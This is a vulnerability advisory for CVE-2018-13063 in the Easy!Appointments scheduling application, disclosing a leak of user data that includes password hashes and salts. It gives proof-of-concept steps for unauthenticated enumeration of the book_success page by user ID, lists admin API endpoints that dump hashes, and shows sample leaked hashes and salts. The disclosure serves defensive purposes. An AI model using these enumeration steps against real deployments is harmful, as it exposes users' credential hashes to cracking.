Description

Easy!Appointments is a highly customizable web application that offers scheduling management for businesses.

Threat

Without being connected, an attacker can collect users' information, including hashed passwords and salts.

Expectation

The application should only send strictly necessary information. It should never send hashed passwords.

Vulnerability Type

CVE ID: CVE-2018-13063

Access Vector: network

Security Risk: high

Vulnerability: CWE-200

CVSS Base Score: 7.5

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Details

The Easy!Appointments application has multiple interfaces which leak users' information, including hashed passwords and salts.

Proof of Concept 1 : Unauthenticated providers' information leak

Without being authenticated, it is possible to collect provider data.

Steps :

1/ Visit the application (e.g. visit localhost)

2/ Select a service and a provider

3/ Choose an appointment date and time

4/ Fill required information

5/ Search the source code of the page "Your appointment has been successfully registered!" for GlobalVariables :

var GlobalVariables = {
          [...]
          'providerData': {
              "id": "85",
              "first_name": "John",
              "last_name": "Doe",
              "email": "[email protected]",
              "mobile_number": "",
              "phone_number": "0123456789",
              "address": "",
              "city": "",
              "state": "",
              [...]
              "settings": {
                  "username": "johndoe",
                  "password": "b7bfe806d58fe09deabfe686a65b49b8a012dbf210033f1acb284ad75a6ba6b6",
                  "salt": "5c67f8e9b16f391a2d94606c9a1c3e8e8be47a47c7292dbe78ba4a75e60871e6",
                  [...]
                  "google_sync": "0",
                  "google_token": "",
                  "google_calendar": "",
                  "sync_past_days": "5",
                  "sync_future_days": "5",
                  "calendar_view": "default"
              }
          },

6/ The book_success page can be enumerated to obtain other users' data. You just need to pass the user ID like in : index.php/appointments/book_success/<ID>. For instance :http://localhost/index.php/appointments/book_success/63.

Proof of Concept 2 : Information leakage in the admin interface

In the admin interface, at the user tab, the API leaks hashed passwords and salts.

  • User tab, at index.php/backend/users (output truncated for the sake of brevity):
var GlobalVariables = {
    csrfToken: "7349322823ef8b3ed03a2bcdb17b6001",
    baseUrl: "http:\/\/localhost",
    dateFormat: "DMY",
    admins: [{
        "id": "84",
        "first_name": "admin",
        "last_name": "admin",
        "email": "[email protected]",
        "mobile_number": "",
        "phone_number": "adminn",
        "address": "",
        "city": "",
        "state": "",
        "zip_code": "",
        "notes": "",
        "id_roles": "1",
        "settings": {
            "username": "admin",
            "password": "5c3716a135b95d6f07d6549a7842386915ee14fd9a003c287f74c5588b7f1fea",
            "salt": "0b12403b95c62f4aaa75ddaa6f5dcb8e54e3e6fe7b504ca97fd676ddfa70ecae",
            "working_plan": "",
            "notifications": "0",
            "google_sync": "0",
            "google_token": "",
            "google_calendar": "",
            "sync_past_days": "5",
            "sync_future_days": "5",
            "calendar_view": "default"
        }
    },
[...]

    providers: [{
        "id": "85",
        "first_name": "John",
        "last_name": "Doe",
        "email": "[email protected]",
        "mobile_number": "",
        "phone_number": "0123456789",
        "address": "",
        "city": "",
        "state": "",
        "zip_code": "",
        "notes": "",
        "id_roles": "2",
        "services": ["13"],
        "settings": {
            "username": "johndoe",
            "password": "b7bfe806d58fe09deabfe686a65b49b8a012dbf210033f1acb284ad75a6ba6b6",
            "salt": "5c67f8e9b16f391a2d94606c9a1c3e8e8be47a47c7292dbe78ba4a75e60871e6",
            [...]

};
  • index.php/backend_api/ajax_filter_admins (Users > Admins) : dumps admin information including password hashes and salts.

  • index.php/backend_api/ajax_filter_providers (Users > Providers) : dumps provider information including password hashes and salts.

  • index.php/backend_api/ajax_filter_secretaries (Users > Secretaries) : dumps secretary information including password hashes and salts.

Proof of Concept 3 : Information leakage in other interfaces

  • http://localhost/index.php/backend/settings : leaks password hash and salt of the current logged user.
  • http://localhost/index.php/backend_api/ajax_get_calendar_appointments leaks password hash and salt of "John Doe" (Default user).
  • http://localhost/index.php/backend_api/ajax_filter_customers leaks password hash and salt of "John Doe" (Default user).

Affected versions

Versions 1.3.0 and prior to 1.2.1 - other versions have not been tested.

Solution

Update to a version superior to 1.3.2.

Timeline (dd/mm/yyyy)

  • 06/03/2018 : Initial discovery
  • 17/04/2018 : Vendor contact
  • 17/05/2018 : Vendor technical team acknowledgment
  • 15/08/2018 : Vendor submits a private 2.2.16.128 pre-release that, according to our test, did not mitigate the issue.
  • 25/10/2019 : Public disclosure

Credits

  • Pierrick VERAN, Sysdream (p.veran -at- sysdream -dot- com)